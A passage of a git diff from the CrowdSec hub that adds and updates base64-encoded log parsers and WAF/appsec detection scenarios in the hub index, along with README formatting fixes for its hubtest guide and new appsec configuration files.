YXJkZWQtRm9yIGlmIHVzZXJzIHNldHMgdHJ1c3RlZCBwcm94aWVzCiAgLSBwYXJzZWQ6IHJlbW90ZV9pcAogICAgZXhwcmVzc2lvbjogZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QuY2xpZW50X2lwCiAgLSBwYXJzZWQ6IHJlbW90ZV9hZGRyCiAgICBleHByZXNzaW9uOiAiZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QucmVtb3RlX2FkZHIgIT0gbmlsID8gU3BsaXQoZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QucmVtb3RlX2FkZHIsICc6JylbMF0gOiBuaWwiCiAgLSBtZXRhOiBzb3VyY2VfaXAKICAgIGV4cHJlc3Npb246IGV2dC5QYXJzZWQucmVtb3RlX2lwCiAgLSBtZXRhOiBodHRwX3N0YXR1cwogICAgZXhwcmVzc2lvbjogaW50KGV2dC5Vbm1hcnNoYWxlZC5jYWRkeS5zdGF0dXMpCiAgLSBtZXRhOiBodHRwX3BhdGgKICAgIGV4cHJlc3Npb246IGV2dC5Vbm1hcnNoYWxlZC5jYWRkeS5yZXF1ZXN0LnVyaQogIC0gcGFyc2VkOiByZXF1ZXN0ICNBZGQgZm9yIGh0dHAtbG9ncyBlbnJpY2hlcgogICAgZXhwcmVzc2lvbjogZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QudXJpCiAgLSBwYXJzZWQ6IHZlcmIKICAgIGV4cHJlc3Npb246IGV2dC5Vbm1hcnNoYWxlZC5jYWRkeS5yZXF1ZXN0Lm1ldGhvZAogIC0gbWV0YTogaHR0cF92ZXJiCiAgICBleHByZXNzaW9uOiBldnQuVW5tYXJzaGFsZWQuY2FkZHkucmVxdWVzdC5tZXRob2QKICAtIHBhcnNlZDogaHR0cF91c2VyX2FnZW50CiAgICBleHByZXNzaW9uOiBldnQuVW5tYXJzaGFsZWQuY2FkZHkucmVxdWVzdC5oZWFkZXJzWydVc2VyLUFnZW50J11bMF0KICAtIG1ldGE6IGh0dHBfdXNlcl9hZ2VudAogICAgZXhwcmVzc2lvbjogZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QuaGVhZGVyc1snVXNlci1BZ2VudCddWzBdCiAgLSBtZXRhOiB0YXJnZXRfZnFkbgogICAgZXhwcmVzc2lvbjogZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QuaG9zdAogIC0gbWV0YTogc3ViX3R5cGUKICAgIGV4cHJlc3Npb246ICJldnQuTWV0YS5odHRwX3N0YXR1cyA9PSAnNDAxJyAmJiBldnQuVW5tYXJzaGFsZWQucmVxdWVzdC5oZWFkZXJzLkF1dGhvcml6YXRpb24gc3RhcnRzV2l0aCAnQmFzaWMgJyA/ICdhdXRoX2ZhaWwnIDogJyci",
    "description": "Parse caddy logs",
    "author": "crowdsecurity",
    "labels": null
@@ -4290,7 +5129,7 @@
   "crowdsecurity/palo-alto-threat-log": {
    "path": "parsers/s01-parse/crowdsecurity/palo-alto-threat-log.yaml",
    "stage": "s01-parse",
-   "version": "0.2",
+   "version": "0.3",
    "versions": {
     "0.1": {
      "digest": "7a9d62f00f202417325dcfac25efc34e5caaa78b469486977967ced0d0ec6cb1",
@@ -4299,10 +5138,14 @@
     "0.2": {
      "digest": "8e2ef39c33263f3b2bdca6e6936a61de1a84a4bc7ad741626b31b9f19d2304b7",
      "deprecated": false
+    },
+    "0.3": {
+     "digest": "a2f3c15040301cdbbf75233c123d089be2380401de5f335b08275929a2f45974",
+     "deprecated": false
     }
    },
    "long_description": "IyMgUGFsbyBBbHRvIFRocmVhdCBMb2cgUGFyc2VyCgoKUGFyc2UgUGFsbyBBbHRvIFRocmVhdCBMb2cuCk1vcmUgaW5mb3JtYXRpb24gaW4gW1BhbG8gQWx0byBEb2N1bWVudGF0aW9uXShodHRwczovL2RvY3MucGFsb2FsdG9uZXR3b3Jrcy5jb20vcGFuLW9zLzktMS9wYW4tb3MtYWRtaW4vbW9uaXRvcmluZy91c2Utc3lzbG9nLWZvci1tb25pdG9yaW5nL3N5c2xvZy1maWVsZC1kZXNjcmlwdGlvbnMvdGhyZWF0LWxvZy1maWVsZHMp",
-   "content": "b25zdWNjZXNzOiBuZXh0X3N0YWdlCmRlYnVnOiB0cnVlCm5hbWU6IGNyb3dkc2VjdXJpdHkvcGFsby1hbHRvLXRocmVhdC1sb2cKZGVzY3JpcHRpb246ICJQYXJzZSBwYWxvLWFsdG8tdGhyZWF0LWxvZyBsb2dzIgpmaWx0ZXI6ICJldnQuUGFyc2VkLnByb2dyYW0gPT0gJ3BhbG8tYWx0by10aHJlYXQnIgpwYXR0ZXJuX3N5bnRheDoKICBQQU5fVElNRVNUQU1QOiAiJXtZRUFSfS8le01PTlRITlVNfS8le01PTlRIREFZfSAle0hPVVJ9OiV7TUlOVVRFfTole0lOVH0iCm5vZGVzOgogIC0gZ3JvazoKICAgICAgcGF0dGVybjogJygle1RJTUVTVEFNUF9JU084NjAxOnN5c2xvZ190aW1lc3RhbXB9ICk/JXtTWVNMT0dIT1NUOnN5c2xvZ19ob3N0bmFtZX0gJXtEQVRBOnBhbl9yZXNlcnZlZH0sJXtEQVRBfSwle1dPUkQ6c2VyaWFsX251bWJlcn0sJXtXT1JEOmxvZ190eXBlfSwle1dPUkQ6bG9nX3N1YnR5cGV9LCV7REFUQTpwYW5fdW5rbm93bn0sJXtQQU5fVElNRVNUQU1QOmdlbmVyYXRpb25fdGltZXN0YW1wfSwle0lQOnNyY19pcH0sJXtJUDpkc3RfaXB9LCV7SVA6bmF0X3NyY19pcH0sJXtJUDpuYXRfZHN0X2lwfSwle0RBVEE6cnVsZX0sJXtEQVRBOnNyY191c2VyfSwle0RBVEE6ZHN0X3VzZXJ9LCV7REFUQTphcHB9LCV7REFUQTp2c3lzfSwle0RBVEE6c3JjX3pvbmV9LCV7REFUQTpkc3Rfem9uZX0sJXtEQVRBOmluZ3Jlc3NfaW50fSwle0RBVEE6ZWdyZXNzX2ludH0sJXtEQVRBOmxvZ19md2RfcHJvZmlsZX0sJXtEQVRBfSwle0RBVEE6c2Vzc2lvbl9pZH0sJXtEQVRBOnJlcGVhdF9jb3VudH0sJXtEQVRBOnNyY19wb3J0fSwle0RBVEE6ZHN0X3BvcnR9LCV7REFUQTpuYXRfc3JjX3BvcnR9LCV7REFUQTpuYXRfZHN0X3BvcnR9LCV7REFUQTpwYW5fbG9nX2ZsYWdzfSwle0RBVEE6aXBfcHJvdG99LCV7REFUQTphY3Rpb259LCgiJXtEQVRBOnVybF9vcl9maWxlbmFtZX0iKT8sJXtEQVRBOnRocmVhdF9pZH0sJXtEQVRBOnVybF9jYXRlZ29yeV9vcl93aWxkZmlyZV92ZXJkaWN0fSwle0RBVEE6c2V2ZXJpdHl9LCV7REFUQTpkaXJlY3Rpb259LCV7REFUQTpsb2dfc2VxX251bX0sJXtEQVRBOmZ3ZF90b19wYW5vcmFtYX0sJXtEQVRBOnNyY19jb3VudHJ5fSwle0RBVEE6ZHN0X2NvdW50cnl9LCV7REFUQTpodHRwX2NvbnRlbnRfdHlwZX0sJXtEQVRBOnBjYXBfaWR9LCV7REFUQTpmaWxlX2hhc2h9LCV7REFUQTp3aWxkZmlyZV9zZXJ2ZXJ9LCV7R1JFRURZREFUQTp1bnBhcnNlZF9kYXRhfScKICAgICAgYXBwbHlfb246IG1lc3NhZ2UKc3RhdGljczoKICAtIHRhcmdldDogZXZ0LlN0clRpbWUKICAgIGV4cHJlc3Npb246IGV2dC5QYXJzZWQuc3lzbG9nX3RpbWVzdGFtcAogIC0gbWV0YTogbG9nX3R5cGUKICAgIHZhbHVlOiBwYWxvX2FsdG8KICAtIG1ldGE6IHNvdXJjZV9pcAogICAgZXhwcmVzc2lvbjogZXZ0LlBhcnNlZC5zcmNfaXAKICAtIG1ldGE6IHNldmVyaXR5CiAgICBleHByZXNzaW9uOiBldnQuUGFyc2VkLnNldmVyaXR5CiAgLSBtZXRhOiB0aHJlYXRfaWQKICAgIGV4cHJlc3Npb246IGV2dC5QYXJzZWQudGhyZWF0X2lkCiAgLSBtZXRhOiBkZXN0aW5hdGlvbl9sb2NhdGlvbgogICAgZXhwcmVzc2lvbjogZXZ0LlBhcnNlZC5kc3RfY291bnRyeQogIC0gbWV0YTogc291cmNlX2xvY2F0aW9uCiAgICBleHByZXNzaW9uOiBldnQuUGFyc2VkLnNyY19jb3VudHJ5CiAgLSBtZXRhOiBydWxlX25hbWUKICAgIGV4cHJlc3Npb246IGV2dC5QYXJzZWQucnVsZQogIC0gbWV0YTogYXBwbGljYXRpb24KICAgIGV4cHJlc3Npb246IGV2dC5QYXJzZWQuYXBwCiAgLSBtZXRhOiB0aHJlYXRfdHlwZQogICAgZXhwcmVzc2lvbjogZXZ0LlBhcnNlZC50aHJlYXRfaWQK",
+   "content": "b25zdWNjZXNzOiBuZXh0X3N0YWdlCm5hbWU6IGNyb3dkc2VjdXJpdHkvcGFsby1hbHRvLXRocmVhdC1sb2cKZGVzY3JpcHRpb246ICJQYXJzZSBwYWxvLWFsdG8tdGhyZWF0LWxvZyBsb2dzIgpmaWx0ZXI6ICJldnQuUGFyc2VkLnByb2dyYW0gPT0gJ3BhbG8tYWx0by10aHJlYXQnIgpwYXR0ZXJuX3N5bnRheDoKICBQQU5fVElNRVNUQU1QOiAiJXtZRUFSfS8le01PTlRITlVNfS8le01PTlRIREFZfSAle0hPVVJ9OiV7TUlOVVRFfTole0lOVH0iCm5vZGVzOgogIC0gZ3JvazoKICAgICAgcGF0dGVybjogJygle1RJTUVTVEFNUF9JU084NjAxOnN5c2xvZ190aW1lc3RhbXB9ICk/JXtTWVNMT0dIT1NUOnN5c2xvZ19ob3N0bmFtZX0gJXtEQVRBOnBhbl9yZXNlcnZlZH0sJXtEQVRBfSwle1dPUkQ6c2VyaWFsX251bWJlcn0sJXtXT1JEOmxvZ190eXBlfSwle1dPUkQ6bG9nX3N1YnR5cGV9LCV7REFUQTpwYW5fdW5rbm93bn0sJXtQQU5fVElNRVNUQU1QOmdlbmVyYXRpb25fdGltZXN0YW1wfSwle0lQOnNyY19pcH0sJXtJUDpkc3RfaXB9LCV7SVA6bmF0X3NyY19pcH0sJXtJUDpuYXRfZHN0X2lwfSwle0RBVEE6cnVsZX0sJXtEQVRBOnNyY191c2VyfSwle0RBVEE6ZHN0X3VzZXJ9LCV7REFUQTphcHB9LCV7REFUQTp2c3lzfSwle0RBVEE6c3JjX3pvbmV9LCV7REFUQTpkc3Rfem9uZX0sJXtEQVRBOmluZ3Jlc3NfaW50fSwle0RBVEE6ZWdyZXNzX2ludH0sJXtEQVRBOmxvZ19md2RfcHJvZmlsZX0sJXtEQVRBfSwle0RBVEE6c2Vzc2lvbl9pZH0sJXtEQVRBOnJlcGVhdF9jb3VudH0sJXtEQVRBOnNyY19wb3J0fSwle0RBVEE6ZHN0X3BvcnR9LCV7REFUQTpuYXRfc3JjX3BvcnR9LCV7REFUQTpuYXRfZHN0X3BvcnR9LCV7REFUQTpwYW5fbG9nX2ZsYWdzfSwle0RBVEE6aXBfcHJvdG99LCV7REFUQTphY3Rpb259LCgiJXtEQVRBOnVybF9vcl9maWxlbmFtZX0iKT8sJXtEQVRBOnRocmVhdF9pZH0sJXtEQVRBOnVybF9jYXRlZ29yeV9vcl93aWxkZmlyZV92ZXJkaWN0fSwle0RBVEE6c2V2ZXJpdHl9LCV7REFUQTpkaXJlY3Rpb259LCV7REFUQTpsb2dfc2VxX251bX0sJXtEQVRBOmZ3ZF90b19wYW5vcmFtYX0sJXtEQVRBOnNyY19jb3VudHJ5fSwle0RBVEE6ZHN0X2NvdW50cnl9LCV7REFUQTpodHRwX2NvbnRlbnRfdHlwZX0sJXtEQVRBOnBjYXBfaWR9LCV7REFUQTpmaWxlX2hhc2h9LCV7REFUQTp3aWxkZmlyZV9zZXJ2ZXJ9LCV7R1JFRURZREFUQTp1bnBhcnNlZF9kYXRhfScKICAgICAgYXBwbHlfb246IG1lc3NhZ2UKc3RhdGljczoKICAtIHRhcmdldDogZXZ0LlN0clRpbWUKICAgIGV4cHJlc3Npb246IGV2dC5QYXJzZWQuc3lzbG9nX3RpbWVzdGFtcAogIC0gbWV0YTogbG9nX3R5cGUKICAgIHZhbHVlOiBwYWxvX2FsdG8KICAtIG1ldGE6IHNvdXJjZV9pcAogICAgZXhwcmVzc2lvbjogZXZ0LlBhcnNlZC5zcmNfaXAKICAtIG1ldGE6IHNldmVyaXR5CiAgICBleHByZXNzaW9uOiBldnQuUGFyc2VkLnNldmVyaXR5CiAgLSBtZXRhOiB0aHJlYXRfaWQKICAgIGV4cHJlc3Npb246IGV2dC5QYXJzZWQudGhyZWF0X2lkCiAgLSBtZXRhOiBkZXN0aW5hdGlvbl9sb2NhdGlvbgogICAgZXhwcmVzc2lvbjogZXZ0LlBhcnNlZC5kc3RfY291bnRyeQogIC0gbWV0YTogc291cmNlX2xvY2F0aW9uCiAgICBleHByZXNzaW9uOiBldnQuUGFyc2VkLnNyY19jb3VudHJ5CiAgLSBtZXRhOiBydWxlX25hbWUKICAgIGV4cHJlc3Npb246IGV2dC5QYXJzZWQucnVsZQogIC0gbWV0YTogYXBwbGljYXRpb24KICAgIGV4cHJlc3Npb246IGV2dC5QYXJzZWQuYXBwCiAgLSBtZXRhOiB0aHJlYXRfdHlwZQogICAgZXhwcmVzc2lvbjogZXZ0LlBhcnNlZC50aHJlYXRfaWQK",
    "description": "Parse palo-alto-threat-log logs",
    "author": "crowdsecurity",
    "labels": null
@@ -6945,6 +7788,38 @@
     "spoofable": 0
    }
   },
+  "crowdsecurity/appsec-vpatch": {
+   "path": "scenarios/crowdsecurity/appsec-vpatch.yaml",
+   "version": "0.3",
+   "versions": {
+    "0.1": {
+     "digest": "6da853b06b3fb716d6094ebdf881df90d27239637ff3389b202b0077eda7acea",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "f43baacd1a6756c8d6c51f632ad52871708b4176d490d77975491fd1c55a8e3d",
+     "deprecated": false
+    },
+    "0.3": {
+     "digest": "7e5f221a8a725d96df1ba2f6e32de34e02dc98abbb9598e72095ad0db94d6a13",
+     "deprecated": false
+    }
+   },
+   "content": "dHlwZTogbGVha3kKZm9ybWF0OiAzLjAKbmFtZTogY3Jvd2RzZWN1cml0eS9hcHBzZWMtdnBhdGNoCmRlc2NyaXB0aW9uOiAiRGV0ZWN0IGFwcHNlYyBhdHRhY2tzIgpmaWx0ZXI6ICJldnQuTWV0YS5sb2dfdHlwZSA9PSAnYXBwc2VjLWJsb2NrJyIKZGlzdGluY3Q6IGV2dC5NZXRhLnJ1bGVfbmFtZQpsZWFrc3BlZWQ6ICI2MHMiCmNhcGFjaXR5OiAxCmdyb3VwYnk6IGV2dC5NZXRhLnNvdXJjZV9pcApibGFja2hvbGU6IDFtCmxhYmVsczoKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGNsYXNzaWZpY2F0aW9uOgogICAgLSBhdHRhY2suVDExMTAKICBsYWJlbDogImFwcHNlYyBibG9ja2VkIgogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIHJlbWVkaWF0aW9uOiB0cnVlCg==",
+   "description": "Detect appsec attacks",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "attack.T1110"
+    ],
+    "confidence": 3,
+    "label": "appsec blocked",
+    "remediation": true,
+    "service": "http",
+    "spoofable": 0
+   }
+  },
   "crowdsecurity/asterisk_bf": {
    "path": "scenarios/crowdsecurity/asterisk_bf.yaml",
    "version": "0.2",
@@ -7935,6 +8810,63 @@
     "spoofable": 0
    }
   },
+  "crowdsecurity/crowdsec-appsec-inband": {
+   "path": "scenarios/crowdsecurity/crowdsec-appsec-inband.yaml",
+   "version": "0.3",
+   "versions": {
+    "0.1": {
+     "digest": "bf202b09575fe406d17ff9cf267cfc81d228bc0575038a8ae91a137ed4405b58",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "0d0bcfec8fb567aa86271f3e5c45feb16c6091f2c52c32db629117b0bba0e793",
+     "deprecated": false
+    },
+    "0.3": {
+     "digest": "71213c8536a1e04b36fe2e207ffec099982e78cf7d3ed6a8ecd26440f47cb1c0",
+     "deprecated": false
+    }
+   },
+   "content": "dHlwZTogbGVha3kKZmlsdGVyOiBldnQuUGFyc2VkLnByb2dyYW0gPT0gJ2Nyb3dkc2VjLWFwcHNlYycgJiYgZXZ0LkFwcHNlYy5IYXNJbkJhbmRNYXRjaGVzID09IHRydWUgJiYgZXZ0LlBhcnNlZC5hY3Rpb24gaW4gWyJkZW55IiwgImRyb3AiXQojZGVidWc6IHRydWUKbmFtZTogY3Jvd2RzZWN1cml0eS9jcm93ZHNlYy1hcHBzZWMtaW5iYW5kCmRlc2NyaXB0aW9uOiBJUCBoYXMgdHJpZ2dlcmVkIG11bHRpcGxlcyBJbiBCYW5kIENyb3dkU2VjIGFwcHNlYyBydWxlcwpibGFja2hvbGU6IDFtCmxlYWtzcGVlZDogMzBzCmNhcGFjaXR5OiAxCmdyb3VwYnk6IGV2dC5NZXRhLnNvdXJjZV9pcApkaXN0aW5jdDogZXZ0LkFwcHNlYy5HZXROYW1lKCkKbGFiZWxzOgogIGNvbmZpZGVuY2U6IDMKICBzcG9vZmFibGU6IDAKICBjbGFzc2lmaWNhdGlvbjoKICAgLSBhdHRhY2suVDExOTAKICBiZWhhdmlvcjogImh0dHA6ZXhwbG9pdCIKICBsYWJlbDogIlRyaWdnZXJlZCBtdWx0aXBsZSBpbmJhbmQgQ3Jvd2RTZWMgYXBwc2VjIHJ1bGVzIgogIHNlcnZpY2U6IGh0dHAKICByZW1lZGlhdGlvbjogdHJ1ZQo=",
+   "description": "IP has triggered multiples In Band CrowdSec appsec rules",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "attack.T1190"
+    ],
+    "confidence": 3,
+    "label": "Triggered multiple inband CrowdSec appsec rules",
+    "remediation": true,
+    "service": "http",
+    "spoofable": 0
+   }
+  },
+  "crowdsecurity/crowdsec-appsec-outofband": {
+   "path": "scenarios/crowdsecurity/crowdsec-appsec-outofband.yaml",
+   "version": "0.3",
+   "versions": {
+    "0.1": {
+     "digest": "1e9a7f01a451b2322f1125b0dfba3c5cdd3dca53e69eb38f245a3e25af6952df",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "59393376cbcfb85cd7e609c5fe2c958aa60c519d7ff0ee310f1bab2af01d38e9",
+     "deprecated": false
+    },
+    "0.3": {
+     "digest": "47b3cd0887f58785c2b6a064f4da46e36a17a6e7d34c4893b0bd8308271fe0be",
+     "deprecated": false
+    }
+   },
+   "content": "IyBqdXN0IGNvdW50IGRpc3RpbmN0IG51bWJlciBvZiByZXF1ZXN0cyBnZXR0aW5nIGJsb2NrZWQKdHlwZTogbGVha3kKZmlsdGVyOiBldnQuUGFyc2VkLnByb2dyYW0gPT0gJ2Nyb3dkc2VjLXdhYXAnICYmIGV2dC5BcHBzZWMuSGFzSW5CYW5kTWF0Y2hlcyA9PSBmYWxzZSAmJiBldnQuUGFyc2VkLmFjdGlvbiBpbiBbImRlbnkiLCAiZHJvcCJdCm5hbWU6IGNyb3dkc2VjdXJpdHkvY3Jvd2RzZWMtYXBwc2VjLW91dG9mYmFuZApkZXNjcmlwdGlvbjogSVAgaGFzIHRyaWdnZXJlZCBtb3JlIHRoYW4gNSBDcm93ZFNlYyBPdXQgT2YgQmFuZCBXYWFwIHJ1bGVzCmJsYWNraG9sZTogMm0KbGVha3NwZWVkOiAzMHMKY2FwYWNpdHk6IDUKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICByZW1lZGlhdGlvbjogdHJ1ZQpncm91cGJ5OiAiZXZ0Lk1ldGEuc291cmNlX2lwIgojLS0tCiMgYXQgbGVhc3QgcmVxdWVzdHMgYmxvY2tlZCBvbiAzIGRpc3RpbmN0IFVSSXMKI3R5cGU6IGxlYWt5CiNkZWJ1ZzogdHJ1ZQojZmlsdGVyOiBldnQuUGFyc2VkLnByb2dyYW0gPT0gJ2Nyb3dkc2VjLXdhYXAnICYmIGV2dC5QYXJzZWQuYWN0aW9uID09ICJkZW55IgojbmFtZTogY3Jvd2RzZWN1cml0eS93YWYtcHJvYmluZwojZGVzY3JpcHRpb246ICJXQUYgcHJvYmluZyIKI2JsYWNraG9sZTogMm0KI2xlYWtzcGVlZDogNjBzCiNjYXBhY2l0eTogNQojZ3JvdXBieTogImV2dC5NZXRhLnNvdXJjZV9pcCArIGV2dC5QYXJzZWQudGFyZ2V0X3VyaSIKI2xhYmVsczoKIyAgdHlwZTogZXhwbG9pdAojICByZW1lZGlhdGlvbjogdHJ1ZQojLS0tCiMgIyBhdCBsZWFzdCA1IHJlcXVlc3RzIGJsb2NrZWQgd2l0aCAqKmRpc3RpbmN0KiogSURzCiN0eXBlOiBjb25kaXRpb25hbAojZGVidWc6IHRydWUKI25hbWU6IGNyb3dkc2VjdXJpdHkveHNzLXByb2JpbmcKI2Rlc2NyaXB0aW9uOiBhdCBsZWFzdCA1IGRpZmZlcmVudCBYU1MgcnVsZXMKI2ZpbHRlcjogZXZ0LlBhcnNlZC5wcm9ncmFtID09ICdjcm93ZHNlYy13YWFwJyAmJiBldnQuUGFyc2VkLmFjdGlvbiA9PSAiZGVueSIKI2NvbmRpdGlvbjogbGVuKCBkaXN0aW5jdCggbWVyZ2UoIGFsbChldnQuUXVldWUsIHsgIy5XYWFwLkdldElEcygpfSkgKSApICkgPiA1CiNjb25kaXRpb246IHwKIyAgTG9nSW5mbygiJSt2IiwgRmxhdHRlbkRpc3RpbmN0KCAKIyAgICAgIG1hcCggcXVldWUuUXVldWUsIAojICAgICAgIy5XYWFwLkJ5VGFnUngoIi4qeHNzLioiKS5HZXRSdWxlSURzKCkKIyAgICAgICkgCiMgICAgKSkgJiYKIyAgbGVuKCAKIyAgICBGbGF0dGVuRGlzdGluY3QoIAojICAgICAgbWFwKCBxdWV1ZS5RdWV1ZSwgCiMgICAgICAjLldhYXAuQnlUYWdSeCgiLip4c3MuKiIpLkdldFJ1bGVJRHMoKQojICAgICAgKSAKIyAgICApKSA+IDUKI2NvbmRpdGlvbjogJ0Rpc3RhbmNlKCJhYSIsICJiYiIsICJjYyIsIHsgIy5QYXJzZWQudG90byA9PSAxIH0pJwojY2FwYWNpdHk6IC0xCiNjYWNoZV9zaXplOiAxMDAwCiNsZWFrc3BlZWQ6IDMwcwojZGlzdGluY3Q6IGV2dC5NZXRhLnNvdXJjZV9pcA==",
+   "description": "IP has triggered more than 5 CrowdSec Out Of Band Waap rules",
+   "author": "crowdsecurity",
+   "labels": {
+    "remediation": true,
+    "type": "exploit"
+   }
+  },
   "crowdsecurity/dovecot-spam": {
    "path": "scenarios/crowdsecurity/dovecot-spam.yaml",
    "version": "0.4",
diff --git a/README.md b/README.md
index 11f356cc69c..69b32781ed5 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,3 @@
-
 <p align="center">
 <img src="https://raw.githubusercontent.com/crowdsecurity/hub/master/assets/crowdsec_hub.svg" alt="CrowdSec" title="CrowdSec" width="400" height="260"/>
 </p>
@@ -6,6 +5,7 @@
 <p align="center">
 <img src="https://img.shields.io/endpoint?url=https://gist.githubusercontent.com/AlteredCoder/ed74e50c43e3b17bdfc4d93149f23d37/raw/hub_parsers_badge.json">
 <img src="https://img.shields.io/endpoint?url=https://gist.githubusercontent.com/AlteredCoder/ed74e50c43e3b17bdfc4d93149f23d37/raw/hub_scenarios_badge.json">
+<img src="https://img.shields.io/endpoint?url=https://gist.githubusercontent.com/AlteredCoder/ed74e50c43e3b17bdfc4d93149f23d37/raw/hub_waap_badge.json">
 </p>
 
 <p align="center">
@@ -15,7 +15,6 @@
 :speech_balloon: <a href="https://gitter.im/crowdsec-project/community?utm_source=share-link&utm_medium=link&utm_campaign=share-link">Gitter (Live chat)</a>
 </p>
 
-
 > CrowdSec Hub for parsers, enrichers and scenarios.
 
 # Foreword
@@ -30,20 +29,17 @@ Feel free to use the parsers/scenarios here as a source of inspiration.
 
 `cscli` provides a `hubtest` sub-command to help contributors to create tests for parsers and scenarios.
 
-
 ## View & use existing tests
 
 :warning: most of `cscli hubtest` commands are expected to be run from the root directory of the hub. A git clone of this repository is the easier way to work :warning:
 
 > list existing tests
 
-`cscli hubtest list` 
-
+`cscli hubtest list`
 
 > run a specific test
 
-`cscli hubtest run [test-name]` 
-
+`cscli hubtest run [test-name]`
 
 > show current tests coverage
 
@@ -52,8 +48,9 @@ Feel free to use the parsers/scenarios here as a source of inspiration.
 ## Create your own (parser) test
 
 We're going to create the CI tests for the dovecot-parser. Before you start :
- - you will need some *actual* logs
- - you'd better know if the service logs on its own or via syslog (we're in the later case here)
+
+- you will need some _actual_ logs
+- you'd better know if the service logs on its own or via syslog (we're in the later case here)
 
 1. Create a new test
 
@@ -71,9 +68,9 @@ We're going to create the CI tests for the dovecot-parser. Before you start :
 
 What is relevant here is that every test is composed of :
 
- - A log file and it's associated type (same `type` as seen in acquis `labels:type`)
- - A configuration specifying which parsers and/or scenarios must be enabled for the test
- - A *ultimately* list of assertions that must be run against the parsers and/or scenarios output
+- A log file and it's associated type (same `type` as seen in acquis `labels:type`)
+- A configuration specifying which parsers and/or scenarios must be enabled for the test
+- A _ultimately_ list of assertions that must be run against the parsers and/or scenarios output
 
 Note: You can provide the parsers and scenarios you want in your test with `--parsers` and `--scenarios` (you can provide multiple parsers and scenarios)
 
@@ -81,7 +78,6 @@ If you want to test only a scenario, you can specify (`--ignore-parsers`) or set
 
 2. Configure your test
 
-
 We need to edit the test configuration to use the relevant parsers :
 
 ```bash
@@ -102,20 +98,20 @@ _note: the order doesn't matter. If the parser name is in the form `author/parse
 Now we need to dump some actual logs into the test's log file :
 
 ```bash
-▶ cat > .tests/dovecot-logs/dovecot-logs.log 
+▶ cat > .tests/dovecot-logs/dovecot-logs.log
 Jan 28 10:16:13 dovecot-box dovecot[7508]: imap-login: Disconnected (auth failed, 1 attempts in 6 secs): user=<toto@toto.com>, method=PLAIN, rip=4.4.4.4, lip=7.7.7.7, TLS, session=<3650VvK5bdIaW-iK>
 Sep 8 07:16:29 canyon dovecot: auth-worker(24058): pam(toto,1.1.1.1,<youpi>): pam_authenticate() failed: Authentication failure (password mismatch?)
 Sep 8 07:46:51 canyon dovecot: auth-worker(24544): pam(toto,1.1.1.1): unknown user
 
 ```
 
-
 3. Run the test for the first time
 
 Now that we have config & logs, let's run it for the first time :
 
 ```bash
 ▶ cscli hubtest run dovecot-logs
+
 INFO[27-09-2021 06:13:59 PM] Running test 'dovecot-logs'                  
 INFO[27-09-2021 06:13:59 PM] parser 'crowdsecurity/dovecot-logs' installed successfully in runtime environment
 INFO[27-09-2021 06:13:59 PM] parser 'crowdsecurity/syslog-logs' installed successfully in runtime environment
@@ -144,9 +140,8 @@ results["s01-parse"]["crowdsecurity/dovecot-logs"][0].Evt.Meta["source_ip"] == "
 As our `parser.assert` is empty, the tool is generating some "suggested" asserts for us.
 Your careful eye will keep only the ones relevant to the parser you're testing :
 
-
 ```bash
-▶ cat > .tests/dovecot-logs/parser.assert 
+▶ cat > .tests/dovecot-logs/parser.assert
 results["s01-parse"]["crowdsecurity/dovecot-logs"][0].Success == true
 results["s01-parse"]["crowdsecurity/dovecot-logs"][0].Evt.Parsed["pid"] == "7508"
 results["s01-parse"]["crowdsecurity/dovecot-logs"][0].Evt.Parsed["timestamp"] == "Jan 28 10:16:13"
@@ -188,11 +183,8 @@ results["s01-parse"]["crowdsecurity/dovecot-logs"][2].Evt.Meta["datasource_path"
 results["s01-parse"]["crowdsecurity/dovecot-logs"][2].Evt.Meta["datasource_type"] == "file"
 ```
 
-
-
 4. Test your newly crafted test
 
-
 ```bash
 ▶ cscli hubtest run dovecot-logs                                
 INFO[27-09-2021 06:19:33 PM] Running test 'dovecot-logs'                  
@@ -203,17 +195,14 @@ Test 'dovecot-logs' passed successfully (39 assertions) 🟩
 
 And be amazed.
 
-
-
 ## Debug your own (parser) test
 
 Things went wrong ? Don't panic
 
 When working on a test, you can as well pass expressions directly to `hubtest` command and see the results :
 
-
 ```bash
-▶ cscli hubtest  eval dovecot-logs -e 'results["s01-parse"]["crowdsecurity/dovecot-logs"][2].Evt.Parsed'             
+▶ cscli hubtest  eval dovecot-logs -e 'results["s01-parse"]["crowdsecurity/dovecot-logs"][2].Evt.Parsed'
 dovecot_login_result: unknown user
 dovecot_remote_ip: 1.1.1.1
 dovecot_user: toto
@@ -230,7 +219,3 @@ timestamp8601: ""
 ## Open your PR
 
 yes.
-
-
-
-
diff --git a/appsec-configs/crowdsecurity/crs.yaml b/appsec-configs/crowdsecurity/crs.yaml
new file mode 100644
index 00000000000..240b0f04d2f
--- /dev/null
+++ b/appsec-configs/crowdsecurity/crs.yaml
@@ -0,0 +1,5 @@
+name: crowdsecurity/crs
+default_remediation: ban
+#log_level: debug
+outofband_rules:
+ - crowdsecurity/crs
\ No newline at end of file
diff --git a/appsec-configs/crowdsecurity/virtual-patching.yaml b/appsec-configs/crowdsecurity/virtual-patching.yaml
new file mode 100644
index 00000000000..d3d26bb7c5b
--- /dev/null
+++ b/appsec-configs/crowdsecurity/virtual-patching.yaml
@@ -0,0 +1,8 @@
+name: crowdsecurity/virtual-patching
+default_remediation: ban
+#log_level: debug
+inband_rules:
+ - crowdsecurity/base-config 
+ - crowdsecurity/vpatch-*
+# inband_options:
+#  disable_body_inspection: true
diff --git a/appsec-rules/crowdsecurity/base-config.yaml b/appsec-rules/crowdsecurity/base-config.yaml
